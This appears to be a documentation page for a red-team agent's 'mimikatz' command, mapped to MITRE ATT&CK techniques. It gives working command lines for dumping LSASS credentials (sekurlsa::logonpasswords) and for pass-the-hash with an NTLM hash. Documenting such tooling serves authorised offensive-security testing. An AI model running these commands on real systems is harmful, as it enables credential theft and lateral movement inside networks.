Skip to main content
Artifacts Generated: Process Create, Process Inject, Process Kill

Summary

Execute one or more mimikatz commands.

Arguments (Positional)

Command

The command you would like mimikatz to run. Some commands require certain privileges and may need the token::elevate Mimikatz command or the builtin equivalent getprivs to be executed first. The mimikatz binary takes space-separated commands. For example, if you wanted to ensure your token had the correct privileges before dumping LSASS, you could do mimikatz token::elevate sekurlsa::logonpasswords to first elevate your token before running logonpasswords. Due to this space-separated command list, if you wish to run a command that has arguments (or spaces in its command name), you’ll need to encapsulate that command in escaped quotes.

Usage

mimikatz -Command [command]
Example 
mimikatz sekurlsa::logonpasswords
mimikatz -Command sekurlsa::logonpasswords

# Running one or more commands with spaces in the command name

mimikatz -Command \"privilege::debug\" \"sekurlsa::pth /domain:DOMAIN /user:USERNAME /ntlm:HASH\" exit

See Also

MITRE ATT&CK Mapping

  • T1134
  • T1098
  • T1547
  • T1555
  • T1003
  • T1207
  • T1558
  • T1552
  • T1550

Resrouces